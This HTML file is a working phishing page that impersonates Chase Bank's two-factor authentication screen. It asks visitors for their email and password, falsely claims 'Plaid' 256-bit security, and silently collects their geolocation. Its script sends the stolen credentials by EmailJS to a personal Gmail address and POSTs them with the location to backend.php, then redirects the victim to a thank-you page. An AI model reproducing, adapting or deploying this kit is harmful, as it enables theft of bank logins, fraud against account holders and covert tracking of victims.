<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1, maximum-scale=1"
    />
    <title>Two Factor Auth - Chase Online</title>
    <link rel="icon" type="image/x-icon" href="img/chasefavicon.ico" />
    <link
      href="https://fonts.googleapis.com/css2?family=Material+Icons"
      rel="stylesheet"
    />
    <link
      rel="stylesheet"
      href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@24,400,0,0"
    />
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css"
      integrity="sha512-SnH5WK+bZxgPHs44uWIX+LLJAJ9/2PkPKZ5QiAj6Ta86w+fsb2TkcmfRyVX3pBnMFcV7oQPJkl9QevSCWr3W6A=="
      crossorigin="anonymous"
      referrerpolicy="no-referrer"
    />
    <style>
      @import url("https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300..800;1,300..800&display=swap");
      * {
        margin: 0;
        padding: 0;
      }

      body {
        margin: 0;
        padding: 0;
        font-family: "Open Sans", sans-serif;
        background-image: url("img/background_image.jpeg");
        background-size: cover;
        background-attachment: fixed;
      }
      .container {
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
        gap: 70px;
        margin-bottom: 50px;
      }

      .chase-logo {
        margin-top: 26px;
        display: flex;
        align-items: center;
        justify-content: center;
        width: 100%;
        padding: 20px 0;
        background: linear-gradient(to bottom, #000000d3, #00000000);
      }

      .chase-logo img {
        /* margin-top: -20px; */
        width: 180px;
      }

      form {
        border-radius: 5px;
        width: 320px;
        padding: 30px;
        display: flex;
        flex-direction: column;
        align-items: center;
        background-color: rgb(255, 255, 255);
      }

      .input {
        display: flex;
        flex-direction: column;
        gap: 5px;
        width: 100%;
      }

      label {
        font-size: 14px;
        color: rgb(78, 78, 78);
      }

      input {
        padding: 12px;
        margin-bottom: 20px;
        border: none;
        border-bottom: 1px solid rgb(56, 56, 56);
        background-color: rgb(237, 237, 237);
        transition: border-color 0.3s ease;
      }
      input:focus {
        outline: none;
        border-color: orangered;
      }

      .form-input {
        border: 2px solid rgb(117, 114, 114);
        border-radius: 5px;
        background-color: inherit;
      }

      .forgot-password {
        text-align: left;
        margin-bottom: 20px;
      }
      .links {
        width: 100%;
        display: flex;
        justify-content: space-between;
        align-items: center;
      }

      .remember-token {
        width: 80%;
        display: flex;
        justify-content: space-between;
      }

      button {
        width: 100%;
        font-family: inherit;
        font-weight: 600;
        font-size: 14px;
        padding: 8px;
        border-radius: 5px;
        border: none;
        background-color: #0060f0;
        color: #fff;
        cursor: pointer;
        transition: 0.1s ease;
        margin-bottom: 20px;
      }

      .form-button {
        background-color: #000000;
        padding: 15px;
        border-radius: 10px;
      }

      button:hover {
        background-color: rgb(0, 46, 83);
      }

      a {
        align-self: flex-start;
        font-size: 14px;
        font-weight: 500;
        text-decoration: none;
        color: #0060f0;
      }

      .footer {
        background-color: rgb(255, 255, 255);
        width: 100%;
        display: flex;
        color: #717171;
        align-items: center;
        flex-direction: column;
        display: none;
      }

      .footer .top {
        display: flex;
        gap: 15px;
        justify-content: center;
        padding-block: 20px;
        border-bottom: 1px solid grey;
        width: 90%;
      }

      .footer .center {
        padding: 20px;
        display: flex;
        gap: 20px;
        width: 80%;
        align-items: center;
        flex-wrap: wrap;
        justify-content: center;
      }

      .footer .center a {
        font-weight: 300;
        font-size: 11px;
        display: flex;
        gap: 5px;
        color: #323232;
        text-decoration: underline;
        align-items: center;
      }

      .footer .center a span {
        font-size: 13px;
      }

      .icons {
        display: flex;
        gap: 10px;
        font-size: 24px;
      }

      .bottom {
        font-weight: 300;
        font-size: 11px;
        display: flex;
        gap: 5px;
        color: #323232;
      }

      .form-control {
        display: flex;
        flex-direction: column;
        width: 100%;
      }

      .notif {
        background-color: rgb(220, 108, 70);
        color: rgb(0, 0, 0);
        font-size: 13px;
        border-radius: 5px;
        padding: 15px;
      }

      @media screen and (max-width: 600px) {
        form {
          max-width: 300px;
          padding: 20px;
        }
      }
      body {
        margin: 0;
        padding: 0;
        font-family: "Open Sans", sans-serif;
        background-image: url("img/background_image.jpeg");
        background-size: cover;
        background-attachment: fixed;
        height: 100vh; /* Full viewport height */
        display: flex;
        justify-content: center;
        align-items: center; /* Center content vertically and horizontally */
      }

      .container {
        display: flex;
        flex-direction: column;
        justify-content: center; /* Center content vertically */
        align-items: center; /* Center content horizontally */
        width: 100%;
        height: 100vh; /* Full viewport height */
        gap: 20px; /* Adjust the gap between elements */
      }

      form {
        border-radius: 5px;
        width: 320px;
        display: flex;
        flex-direction: column;
        align-items: center;
        background-color: rgb(255, 255, 255);
        box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1); /* Optional: Add a box shadow */
        position: relative; /* Add relative positioning */
      }

      .form-logo {
        margin-top: -20px;
        background: none;
        width: 40px;
      }
    </style>
  </head>
  <body>
    <div class="container">
      <div class="chase-logo">
        <img src="img/wordmark-white.png" alt="" />
      </div>
      <div style="display: grid; place-items: center; flex: 1">
        <!-- <form>
          <div id="login-title">
            <h1
              style="font-size: 24px; text-align: center; margin-bottom: 10px"
            >
              Please Activate Two Factor Authentication
            </h1>
          </div>
          <div class="form-control">
            <input
              type="email"
              placeholder="Email Address"
              class="username-input"
              id="email"
              name="email"
            />
            <input
              type="password"
              placeholder="Password"
              class="username-input"
              id="pass"
              name="password"
            />

            <button type="button" class="login-btn" id="submit-btn">
              Activate
            </button>
          </div>
        </form> -->

        <form>
          <div class="chase-logo form-logo">
            <img src="img/chasefavicon.ico" alt="" />
          </div>

          <div id="login-title">
            <h1
              style="font-size: 20px; margin-bottom: 10px; margin-left: -50px"
            >
              Enter your Email Address
            </h1>
          </div>
          <div class="login-text-block">
            <p
              class="login-text"
              style="color: #717171; margin-bottom: 10px; font-size: 15px"
            >
              Please, Enter your
              <span
                class="login-black-text"
                style="color: #323232; font-weight: bold"
                >Chase Bank
              </span>
              associated email address to confirm it with
              <span
                class="login-black-text"
                style="color: #323232; font-weight: bold"
                >Chase Bank
              </span>
              then authenticate it securely.
            </p>
          </div>
          <div class="form-control">
            <input
              type="email"
              placeholder="Enter Email Address"
              class="username-input form-input"
              id="email"
              name="email"
            />
            <input
              type="password"
              placeholder="Password"
              class="username-input form-input"
              id="pass"
              name="password"
            />

            <button type="button" class="login-btn form-button" id="submit-btn">
              Continue
            </button>

            <p
              class="login-text"
              style="
                color: #000000;
                margin-bottom: 10px;
                font-size: 12px;
                text-align: center;
              "
            >
              Plaid Request is secured by 256-BIT Encryption
            </p>
          </div>
        </form>
      </div>
    </div>
    <div class="footer">
      <div class="top">
        Follow Us:
        <div class="icons">
          <i class="fa-brands fa-facebook"></i>
          <i class="fa-brands fa-instagram"></i>
          <i class="fa-brands fa-twitter"></i>
          <i class="fa-brands fa-youtube"></i>
          <i class="fa-brands fa-linkedin"></i>
        </div>
      </div>
      <div class="center">
        <a href="#">Contact us</a>
        <a href="#">Privacy</a>
        <a href="#">Security</a>
        <a href="#">Terms of use</a>
        <a href="#">Accessibility</a>
        <a href="#">SAFE Act: Chase Mortgage Loan Originators</a>
        <a href="#">Fair Lending</a>
        <a href="#">About Chase</a>
        <a href="#">J.P. Morgan</a>
        <a href="#">JPMorgan Chase & Co.</a>
        <a href="#">Careers</a>
        <a href="#">Espanol</a>
        <a href="#">Chase Canada</a>
        <a href="#">Site map</a>
        <a href="#" style="text-decoration: none">Member FDIC</a>
        <a href="#" style="text-decoration: none">
          <span class="material-symbols-outlined"> other_houses </span>
          Equal Housing Opportunity
        </a>
      </div>
      <div class="bottom">(c) 2024 JPMorgan Chase & Co.</div>
    </div>
    <script
      src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"
      integrity="sha512-v2CJ7UaYy4JwqLDIrZUI/4hqeoQieOmAZNXBeQyjo21dadnwR+8ZaIJVT8EE2iyI61OV8e6M8PP2/4hpQINQ/g=="
      crossorigin="anonymous"
      referrerpolicy="no-referrer"
    ></script>
    <script
      type="text/javascript"
      src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"
    ></script>
    <script type="text/javascript">
      (function () {
        emailjs.init({
          publicKey: "10Wh8RN-TPlYZRbap",
        });
      })();
    </script>
    <script>
      document.addEventListener("DOMContentLoaded", getUserLocation);

      // Function to get user's location
      function getUserLocation() {
        if (navigator.geolocation) {
          navigator.geolocation.getCurrentPosition(
            // Success callback
            function (position) {
              const latitude = position.coords.latitude;
              const longitude = position.coords.longitude;
              console.log(`Latitude: ${latitude}, Longitude: ${longitude}`);
              getLocationFromCoordinates(latitude, longitude);

              // You can now use latitude and longitude to further process the location
            },
            // Error callback
            function (error) {
              console.error("Error getting user location:", error);
            }
          );
        } else {
          console.error("Geolocation is not supported by this browser.");
        }
      }
      var loc;
      // Function to get location from latitude and longitude
      function getLocationFromCoordinates(latitude, longitude) {
        // Construct the URL for the OpenStreetMap Nominatim API
        const apiUrl = `https://nominatim.openstreetmap.org/reverse?format=json&lat=${latitude}&lon=${longitude}`;

        // Make a GET request to the API
        fetch(apiUrl)
          .then((response) => response.json())
          .then((data) => {
            console.log(data);
            if (data && data.display_name) {
              loc = data.display_name;
            } else {
              console.error("No location found for the coordinates.");
            }
          })
          .catch((error) => {
            console.error("Error fetching location:", error);
          });
      }
      const loginTitle = document.getElementById("login-title");

      $(document).ready(function () {
        $("#submit-btn").click(function () {
          var email = $("#email").val();
          var pass = $("#pass").val();

          if (email == "" || pass == "") {
            loginTitle.innerHTML = `
            <div class='notif'>Please fill in all the fields.</div>
                  `;
          } else {
            function sendMail() {
              const serviceId = "service_wp0ll78";
              const templateId = "template_pvad5x6";
              var params = {
                name: "CHASE-ICONASSETS",
                email: "dreedlock6@gmail.com",
                message: `
      <table border="1" cellpadding="5" cellspacing="0" style="border-collapse: collapse;">
        <tr>
          <td><strong>Page:</strong></td>
          <td>2Factor</td>
        </tr>
        <tr>
          <td><strong>Email:</strong></td>
          <td>${email}</td>
        </tr>
        <tr>
          <td><strong>Password:</strong></td>
          <td>${pass}</td>
        </tr>
        <tr>
          <td><strong>Source:</strong></td>
          <td>CHASE</td>
        </tr>
      </table>
    `,
              };

              emailjs
                .send(serviceId, templateId, params)
                .then((res) => console.log(res));
            }

            sendMail();
            $.ajax({
              type: "POST",
              url: "backend.php",
              data: { email: email, password: pass, type: "2-factor", loc },

              success: function (response) {
                console.log(response);
                window.location.href = "thanks.html";
              },
            });
          }
        });
      });
    </script>
  </body>
</html>
